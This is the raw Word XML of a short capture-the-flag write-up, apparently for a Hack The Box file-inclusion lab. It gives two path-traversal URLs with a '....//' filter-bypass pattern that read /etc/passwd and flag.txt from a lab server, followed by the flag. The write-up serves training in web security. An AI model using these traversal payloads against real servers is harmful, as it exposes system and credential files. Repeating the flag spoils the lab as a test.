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FD601" w14:textId="25F1010E" w:rsidR="00465CB1" w:rsidRDefault="00F15B20" w:rsidP="00F15B20">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15B20">
        <w:t>The above web application employs more than one filter to avoid LFI exploitation. Try to bypass these filters to read /flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C16C7C2" w14:textId="517ECF80" w:rsidR="00F15B20" w:rsidRDefault="001C5BC4" w:rsidP="00F15B20">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419B5DEF" w14:textId="19A89772" w:rsidR="001C5BC4" w:rsidRDefault="001C5BC4" w:rsidP="00F15B20">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00F5202D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://94.237.54.42:52218/index.php?language=languages///....//....//....//.....//....//....//....//....//....//etc/passwd</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2FBEFBE5" w14:textId="0F843607" w:rsidR="001C5BC4" w:rsidRDefault="001C5BC4" w:rsidP="00F15B20">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21932E75" w14:textId="30143A54" w:rsidR="001C5BC4" w:rsidRDefault="001C5BC4" w:rsidP="00F15B20">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="130E6343" wp14:editId="4A94AD09">
            <wp:extent cx="5943600" cy="4894580"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="190485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54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8854" w14:textId="1AD0739B" w:rsidR="004C2FAD" w:rsidRDefault="004C2FAD" w:rsidP="00F15B20">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEB7E31" w14:textId="7CA72D67" w:rsidR="004C2FAD" w:rsidRDefault="004C2FAD" w:rsidP="00F15B20">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00F5202D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://94.237.54.42:52218/index.php?language=languages///....//....//....//.....//....//....//....//....//....//flag.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="67A69ABF" w14:textId="541221CF" w:rsidR="004C2FAD" w:rsidRDefault="004C2FAD" w:rsidP="00F15B20">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1A79D0" w14:textId="2A90CF60" w:rsidR="004C2FAD" w:rsidRDefault="004C2FAD" w:rsidP="00F15B20">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="107068AD" wp14:editId="1D82BC0A">
            <wp:extent cx="5943600" cy="2059940"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2042261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618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3920" w14:textId="41829D68" w:rsidR="00407F5A" w:rsidRDefault="00407F5A" w:rsidP="00F15B20">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>P/s:</w:t>
      </w:r>
      <w:r w:rsidRPr="00407F5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="005C20AC" w:rsidRPr="005C20AC">
        <w:t>HTB{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="005C20AC" w:rsidRPr="005C20AC">
        <w:t>64$!c_f!lt3r$_w0nt_$t0p_lf!}</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0040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46E01"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6CA44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86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B1"/>
    <w:rsid w:val="001C5BC4"/>
    <w:rsid w:val="00210D4D"/>
    <w:rsid w:val="002C6A98"/>
    <w:rsid w:val="00407F5A"/>
    <w:rsid w:val="004362A9"/>
    <w:rsid w:val="00465CB1"/>
    <w:rsid w:val="004C2FAD"/>
    <w:rsid w:val="005C20AC"/>
    <w:rsid w:val="007A267B"/>
    <w:rsid w:val="00F1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69C5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1B2CBCE0-933B-423C-A653-7329B46B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C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5B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94.237.54.42:52218/index.php?language=languages///....//....//....//.....//....//....//....//....//....//flag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94.237.54.42:52218/index.php?language=languages///....//....//....//.....//....//....//....//....//....//etc/passw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6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-27T15:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-01T14:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>